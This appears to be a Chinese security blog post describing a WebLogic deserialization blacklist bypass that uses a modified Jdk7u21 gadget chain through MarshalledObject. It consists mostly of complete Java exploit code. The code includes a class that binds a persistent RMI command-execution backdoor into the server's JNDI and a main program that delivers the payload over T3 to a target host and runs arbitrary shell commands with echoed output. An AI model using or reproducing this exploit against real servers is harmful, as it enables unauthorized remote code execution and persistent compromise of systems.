Jdk7u21新链(hw爆出)

2021-05-06

前言

hw爆出的weblogic Jdk7u21绕过

代码分析

weblogicNewJdk7u21.java

package com;

import util.Gadgets;
import util.Reflections;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.InvocationHandler;
import java.rmi.MarshalledObject;
import java.util.HashMap;
import java.util.LinkedHashSet;

public class weblogicNewJdk7u21 {
    public Object getObject(String command) throws Exception{
        Jdk7u21 jdk7u21=new Jdk7u21();
        Object object =jdk7u21.getObject(command);
        ByteArrayOutputStream bos=new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream=new ObjectOutputStream(bos);
        objectOutputStream.writeObject(object);
        byte[] bytesCode=bos.toByteArray();

        Object marshalledObject=Reflections.getFirstCtor(MarshalledObject.class.getName()).newInstance(bytesCode);
        Reflections.setFieldValue(marshalledObject, "objBytes", bytesCode);


        String zeroHashCodeStr = "f5a5a608";

        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");

        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(tempHandler, "type", MarshalledObject.class);
        Object proxy = Gadgets.createProxy(tempHandler, Override.class);

        LinkedHashSet set = new LinkedHashSet(); // maintain order
        set.add(marshalledObject);
        set.add(proxy);
        map.put(zeroHashCodeStr, marshalledObject); // swap in real object

        return set;
    }
}

Jdk7u21.java

package com;

import util.Gadgets;
import util.Reflections;

import javax.xml.transform.Templates;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;

public class Jdk7u21 {
    public Object getObject(String command) throws Exception{
        final Object templates = Gadgets.createTemplatesImpl(command);

        String zeroHashCodeStr = "f5a5a608";

        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");

        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(tempHandler, "type", Templates.class);
        Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

        LinkedHashSet set = new LinkedHashSet(); // maintain order
        set.add(templates);
        set.add(proxy);

        Reflections.setFieldValue(templates, "_auxClasses", null);
        Reflections.setFieldValue(templates, "_class", null);

        map.put(zeroHashCodeStr, templates); // swap in real object

        return set;
    }
}

Jdk7u21为ysoserial原始版本的gadgat，weblogicNew7u21为绕过的gadgat。

jdk7u21原链在var5.invoke处，调用最终结果为调用了TemplatesImpl的newTransformer，因此触发了命令执行

weblogic黑名单过滤从FilteredObjectInputStream开始，如果从中间能跳脱出不适用FilteredObjectInputStream进行反序列化即可绕过黑名单限制。

最终找到一个名为MarshalledObject的类，我们调用MarshalledObject的get方法可以达到之前的效果。剩下的工作为改造Jdk7u21的链，最终改造结果为开头的代码。

编写回显的exp

主要为寻找一个类，其继承Remote抛出RemoteException异常，最终找到RMIRemoteCommandConnection这个类，该类的executeCommand方法接受了一个Command对象，返回值为一个Object。Command对象中存在一个String的成员，因此可以用这个String对象存放需要执行的命令，然后把返回结果作为Object返回

package com;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import oracle.toplink.internal.remotecommand.rmi.RMIRemoteCommandConnection;
import oracle.toplink.remotecommand.Command;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.List;

public class evil  extends AbstractTranslet implements RMIRemoteCommandConnection {
    static {
        try {
            String bindName = "neogogogo1";
            Context ctx = new InitialContext();
            evil evil=new evil();
            ctx.rebind(bindName, evil);
        } catch (NamingException e) {
            e.printStackTrace();
        }
    }


    public Object executeCommand(Command command) throws RemoteException {
        try {
            String cmd=command.getServiceId().getId();

            boolean isLinux = true;
            String osTyp = System.getProperty("os.name");
            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                isLinux = false;
            }
            List<String> cmds = new ArrayList<String>();

            if (isLinux) {
                cmds.add("/bin/bash");
                cmds.add("-c");
                cmds.add(cmd);
            } else {
                cmds.add("cmd.exe");
                cmds.add("/c");
                cmds.add(cmd);
            }

            ProcessBuilder processBuilder = new ProcessBuilder(cmds);
            processBuilder.redirectErrorStream(true);
            Process proc = processBuilder.start();

            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            StringBuffer sb = new StringBuffer();

            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line).append("\n");
            }

            return sb.toString();
        } catch (Exception e) {
            return e.getMessage();
        }
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

main函数的类内容

package com;

import oracle.toplink.internal.remotecommand.ConnectToHostCommand;
import oracle.toplink.internal.remotecommand.rmi.RMIRemoteCommandConnection;
import oracle.toplink.remotecommand.Command;
import oracle.toplink.remotecommand.ServiceId;
import util.Gadgets;
import util.Reflections;
import weblogic.Serializables;
import weblogic.T3ProtocolOperation;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.jndi.Environment;

import javax.naming.Context;
import javax.naming.NamingException;
import javax.xml.transform.Templates;
import java.io.FileNotFoundException;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;

public class main {
    public static void main(String args[]) throws Exception {
        if(args.length<3){
            System.out.println("By huahua");
            System.out.println("java -jar exp.jar host port command");
            System.exit(0);
        }
        String host=args[0];
        String port=args[1];
        String cmd=args[2];
        weblogicNewJdk7u21 weblogicNewJdk7u21=new weblogicNewJdk7u21();
        Object object=weblogicNewJdk7u21.getObject("touch /tmp/huahua666");
        byte[] exp= Serializables.serialize(object);
//        T3ProtocolOperation.send("192.168.232.129","7001",exp);
        try {
            Context initialContext = getInitialContext(converUrl(host, "7001"));
            RMIRemoteCommandConnection remoteCode = (RMIRemoteCommandConnection) initialContext.lookup("neogogogo1");
            ServiceId serviceId=new ServiceId(null,cmd,null);
            Command command=new ConnectToHostCommand();
            command.setServiceId(serviceId);
            Object result=remoteCode.executeCommand(command);
            System.out.println(result);
        }catch (Exception e){
            T3ProtocolOperation.send(host,port,exp);
            System.out.println("rmi installed，请再次执行命令！(如果该提示出现两次或以上，则表示目标无此漏洞)");
        }
    }
    public static Context getInitialContext(String url) throws NamingException, FileNotFoundException {
        Environment environment = new Environment();
        environment.setProviderUrl(url);
        environment.setEnableServerAffinity(false);
//        environment.setSSLClientTrustManager(new WeblogicTrustManager());
        return environment.getInitialContext();
    }
    public static String converUrl(String host, String port) {
        return "t3://" + host + ":" + port;
    }
}

后记

无